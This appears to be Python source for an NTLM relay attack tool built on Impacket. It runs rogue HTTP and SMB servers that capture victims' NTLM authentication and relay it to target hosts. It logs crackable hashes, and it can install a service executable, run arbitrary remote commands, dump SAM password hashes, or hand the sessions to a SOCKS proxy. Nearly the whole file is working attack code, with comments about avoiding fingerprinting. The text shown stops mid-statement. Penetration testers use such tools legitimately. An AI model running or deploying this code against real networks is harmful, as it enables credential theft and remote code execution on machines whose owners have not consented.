from impacket.nt_errors import STATUS_LOGON_FAILURE, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NOT_SUPPORTED, \
STATUS_MORE_PROCESSING_REQUIRED
from impacket.ntlm import NTLMAuthChallengeResponse, NTLMAuthNegotiate, NTLMAuthChallenge, AV_PAIRS, \
NTLMSSP_AV_HOSTNAME, generateEncryptedSessionKey
from impacket.smb import NewSMBPacket, SMBCommand, SMB, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Extended_Data, \
SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Extended_Response_Data, \
SMBSessionSetupAndX_Parameters, SMBSessionSetupAndX_Extended_Parameters, TypesMech, \
SMBSessionSetupAndXResponse_Parameters, SMBSessionSetupAndXResponse_Data
from impacket.smb3 import SMB3
from impacket.smbconnection import SMBConnection
from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile, SMBSERVER
from impacket.spnego import ASN1_AID, SPNEGO_NegTokenResp, SPNEGO_NegTokenInit
try:
from Cryptodome.Cipher import DES, AES, ARC4
except Exception:
logging.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
logging.critical("See https://pypi.org/project/pycryptodomex/")
# Global Variables
# This is the list of hosts that have been attacked already in case -one-shot was chosen
ATTACKED_HOSTS = set()
CODEC = sys.getdefaultencoding()
class doAttack(Thread):
def __init__(self, SMBClient, exeFile, command):
Thread.__init__(self)
if isinstance(SMBClient, SMB) or isinstance(SMBClient, SMB3):
self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
else:
self.__SMBConnection = SMBClient
self.__exeFile = exeFile
self.__command = command
self.__answerTMP = b''
if exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
global ATTACKED_HOSTS
if self.__exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not.
# Why? They are needed to avoid INVALID_PARAMETER.
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception as e:
logging.debug('Exception:', exc_info=True)
# Something went wrong; most probably we don't have admin access. Aborting.
logging.error(str(e))
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
return
try:
if self.__command is not None:
remoteOps._RemoteOperations__executeRemote(self.__command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = b''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
logging.debug('Raw answer %r' % self.__answerTMP)
try:
print(self.__answerTMP.decode(CODEC))
except UnicodeDecodeError:
logging.error('Decoding error detected, consider running chcp.com at the target,\nmap the result with '
'https://docs.python.org/3/library/codecs.html#standard-encodings\nand then execute smbrelayx.py '
'again with -codec and the corresponding codec')
print(self.__answerTMP)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.debug('Exception:', exc_info=True)
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
logging.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
try:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.error(str(e))
pass
class SMBClient(SMB):
def __init__(self, remote_name, extended_security = True, sess_port = 445):
self._extendedSecurity = extended_security
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
SMB.__init__(self,remote_name, remote_name, sess_port = sess_port)
def neg_session(self):
neg_sess = SMB.neg_session(self, extended_security = self._extendedSecurity)
return neg_sess
def setUid(self,uid):
self._uid = uid
def login_standard(self, user, domain, ansiPwd, unicodePwd):
smb = NewSMBPacket()
smb['Flags1'] = 8
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Data()
sessionSetup['Parameters']['MaxBuffer'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VCNumber'] = os.getpid()
sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey']
sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd)
sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd)
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE
sessionSetup['Data']['AnsiPwd'] = ansiPwd
sessionSetup['Data']['UnicodePwd'] = unicodePwd
sessionSetup['Data']['Account'] = user
sessionSetup['Data']['PrimaryDomain'] = domain
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except:
logging.error("Error login_standard")
return None, STATUS_LOGON_FAILURE
else:
self._uid = smb['Uid']
return smb, STATUS_SUCCESS
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
if self._SignatureRequired is True:
if self.domainIp is None:
logging.error("Signature is REQUIRED on the other end, attack will not work")
else:
logging.info("Signature is REQUIRED on the other end, using NETLOGON approach")
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
logging.info("Connecting to %s NETLOGON service" % self.domainIp)
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'] )
_, machineAccount = self.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = AV_PAIRS(av_pairs)
serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
except:
logging.debug("Exception:", exc_info=True)
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.machineHashes) > 0:
lmhash, nthash = self.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount,'', domainName, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName+'\x00', '12345678')
serverChallenge = resp['ServerChallenge']
if self.machineHashes == '':
ntHash = None
else:
ntHash = unhexlify(self.machineHashes.split(':')[1])
sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678', serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00',
ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authenticateMessage[
'user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = '\x00'*8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except DCERPCException as e:
logging.debug('Exception:', exc_info=True)
logging.error(str(e))
return e.get_error_code()
logging.info("%s\\%s successfully validated through NETLOGON" % (
domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != '':
signingKey = generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4']['UserSessionKey']
logging.info("SMB Signing key: %s " % hexlify(signingKey))
self.set_session_key(signingKey)
self._SignatureEnabled = True
self._SignSequenceNumber = 2
self.set_flags(flags1 = SMB.FLAGS1_PATHCASELESS, flags2 = SMB.FLAGS2_EXTENDED_SECURITY)
return STATUS_SUCCESS
def sendAuth(self, serverChallenge, authenticateMessageBlob):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
smb['Uid'] = self._uid
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob)
sessionSetup['Data']['SecurityBlob'] = authenticateMessageBlob
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
errorCode = smb['ErrorCode'] << 16
errorCode += smb['_reserved'] << 8
errorCode += smb['ErrorClass']
if errorCode == STATUS_SUCCESS and self._SignatureRequired is True and self.domainIp is not None:
try:
errorCode = self.netlogonSessionKey(serverChallenge, authenticateMessageBlob)
except:
logging.debug('Exception:', exc_info=True)
raise
return smb, errorCode
def sendNegotiate(self, negotiateMessage):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Let's build a NegTokenInit with the NTLMSSP
# TODO: In the future we should be able to choose different providers
blob = SPNEGO_NegTokenInit()
# NTLMSSP
blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
blob['MechToken'] = negotiateMessage
sessionSetup['Parameters']['SecurityBlobLength'] = len(blob)
sessionSetup['Parameters'].getData()
sessionSetup['Data']['SecurityBlob'] = blob.getData()
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except Exception:
logging.error("SessionSetup Error!")
raise
else:
# We will need to use this uid field for all future requests/responses
self._uid = smb['Uid']
# Now we have to extract the blob to continue the auth process
sessionResponse = SMBCommand(smb['Data'][0])
sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2'])
sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
sessionData.fromString(sessionResponse['Data'])
respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])
return respToken['ResponseToken']
class HTTPRelayServer(Thread):
class HTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, server_address, RequestHandlerClass, target, exeFile, command, mode, outputFile,
one_shot, returnStatus=STATUS_SUCCESS, runSocks = False):
self.target = target
self.exeFile = exeFile
self.command = command
self.mode = mode
self.returnStatus = returnStatus
self.outputFile = outputFile
self.one_shot = one_shot
self.runSocks = runSocks
socketserver.TCPServer.__init__(self,server_address, RequestHandlerClass)
class HTTPHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self,request, client_address, server):
self.server = server
self.protocol_version = 'HTTP/1.1'
self.challengeMessage = None
self.target = None
self.client = None
self.machineAccount = None
self.machineHashes = None
self.domainIp = None
global ATTACKED_HOSTS
if self.server.target in ATTACKED_HOSTS and self.server.one_shot:
logging.info(
"HTTPD: Received connection from %s, skipping %s, already attacked" % (
client_address[0], self.server.target))
return
if self.server.target is not None:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], self.server.target))
else:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], client_address[0]))
http.server.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
def handle_one_request(self):
try:
http.server.SimpleHTTPRequestHandler.handle_one_request(self)
except Exception:
logging.debug("Exception:", exc_info=True)
pass
def log_message(self, format, *args):
return
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_AUTHHEAD(self, message = ''):
self.send_response(401)
self.send_header('WWW-Authenticate', message.decode('utf-8'))
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
def send_error(self, code, message=None):
if message is not None and (message.find('RPC_OUT') >= 0 or message.find('RPC_IN') >= 0):
return self.do_GET()
return http.server.SimpleHTTPRequestHandler.send_error(self,code,message)
def do_GET(self):
messageType = 0
if PY2:
authorizationHeader = self.headers.getheader('Authorization')
else:
authorizationHeader = self.headers.get('Authorization')
if authorizationHeader is None:
self.do_AUTHHEAD(message = b'NTLM')
pass
else:
#self.do_AUTHHEAD()
typeX = authorizationHeader
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 1:
if self.server.mode.upper() == 'REFLECTION':
self.target = self.client_address[0]
else:
self.target = self.server.target
try:
if self.client is not None:
logging.error('Still performing an attack against %s' % self.client.get_remote_host())
self.send_response(404)
self.end_headers()
return
self.client = SMBClient(self.target, extended_security = True)
self.client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
self.client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
clientChallengeMessage = self.client.sendNegotiate(token)
self.challengeMessage = NTLMAuthChallenge()
self.challengeMessage.fromString(clientChallengeMessage)
self.do_AUTHHEAD(message = b'NTLM '+base64.b64encode(clientChallengeMessage))
elif messageType == 3:
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '' or self.target == '127.0.0.1':
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = token
clientResponse, errorCode = self.client.sendAuth(self.challengeMessage['challenge'],
respToken2.getData())
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials, except
# when coming from localhost
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
self.do_AUTHHEAD(b'NTLM')
else:
# Relay worked, do whatever we want here...
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.outputFile)
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible for removing it from the set
global ATTACKED_HOSTS
if self.target not in ATTACKED_HOSTS:
ATTACKED_HOSTS.add(self.target)
if self.server.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None,urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=self.client)
activeConnections.put(
(self.target, 445, 'SMB', ('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient,
{'CHALLENGE_MESSAGE': self.challengeMessage}))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
else:
clientThread = doAttack(self.client,self.server.exeFile,self.server.command)
self.client = None
clientThread.start()
else:
logging.error('%s is being attacked at the moment, skipping.. ' % self.target)
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
return
def __init__(self, outputFile=None):
Thread.__init__(self)
self.daemon = True
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.command = None
self.target = None
self.mode = None
self.outputFile = outputFile
self.one_shot = False
self.runSocks = False
def setTargets(self, target):
self.target = target
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Not implemented yet.
pass
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
def run(self):
logging.info("Setting up HTTP Server")
httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.target, self.exeFile, self.command, self.mode,
self.outputFile, self.one_shot, runSocks = self.runSocks)
httpd.serve_forever()
class SMBRelayServer(Thread):
def __init__(self, outputFile = None):
Thread.__init__(self)
self.daemon = True
self.server = 0
self.target = ''
self.mode = 'REFLECTION'
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.returnStatus = STATUS_SUCCESS
self.command = None
self.one_shot = False
self.runSocks = False
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
if outputFile is not None:
smbConfig.set('global','jtr_dump_path',outputFile)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
self.server = SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.server.processConfigFile()
self.origSmbComNegotiate = self.server.hookSmbCommand(SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
self.origSmbSessionSetupAndX = self.server.hookSmbCommand(SMB.SMB_COM_SESSION_SETUP_ANDX,
self.SmbSessionSetupAndX)
# Let's use the SMBServer Connection dictionary to keep track of our client connections as well
self.server.addConnection('SMBRelay', '0.0.0.0', 445)
def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
if self.mode.upper() == 'REFLECTION':
self.target = connData['ClientIP']
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
if self.target in smbData:
# Remove the previous connection and use the last one
smbClient = smbData[self.target]['SMBClient']
del smbClient
del smbData[self.target]
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
else:
logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target))
try:
if recvPacket['Flags2'] & SMB.FLAGS2_EXTENDED_SECURITY == 0:
extSec = False
else:
if self.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
logging.info("Downgrading to standard security")
extSec = False
recvPacket['Flags2'] &= ~SMB.FLAGS2_EXTENDED_SECURITY
else:
extSec = True
client = SMBClient(self.target, extended_security = extSec)
client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
else:
encryptionKey = client.get_encryption_key()
smbData[self.target] = {}
smbData[self.target]['SMBClient'] = client
if encryptionKey is not None:
connData['EncryptionKey'] = encryptionKey
smbServer.setConnectionData('SMBRelay', smbData)
smbServer.setConnectionData(connId, connData)
return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
#############################################################
def SmbSessionSetupAndX(self, connId, smbServer, smbCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
#############################################################
respSMBCommand = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
global ATTACKED_HOSTS
if connData['_dialects_parameters']['Capabilities'] & SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = SMBSessionSetupAndX_Extended_Response_Parameters()
respData = SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = SMBSessionSetupAndX_Extended_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
if unpack('B',sessionSetupData['SecurityBlob'][0:1])[0] != ASN1_AID:
# If there is no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
# It might happen if the target connects back before a previous connection has finished, we might
# get to this function w/o having the dict and smbClient entry created, because a
# NEGOTIATE_CONNECTION was not needed
if (self.target in smbData) is False:
smbData[self.target] = {}
smbClient = SMBClient(self.target)
smbClient.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
smbClient.set_timeout(60)
smbData[self.target]['SMBClient'] = smbClient
smbClient = smbData[self.target]['SMBClient']
clientChallengeMessage = smbClient.sendNegotiate(token)
challengeMessage = NTLMAuthChallenge()
challengeMessage.fromString(clientChallengeMessage)
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegState'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
# Let's store it in the connection data
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
# SMBRelay: Ok, so now we have the Auth token, let's send it
# back to the target system and hope for the best.
smbClient = smbData[self.target]['SMBClient']
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
clientResponse, errorCode = smbClient.sendAuth(connData['CHALLENGE_MESSAGE']['challenge'],
sessionSetupData['SecurityBlob'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
# del (smbData[self.target])
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible for removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient, connData))
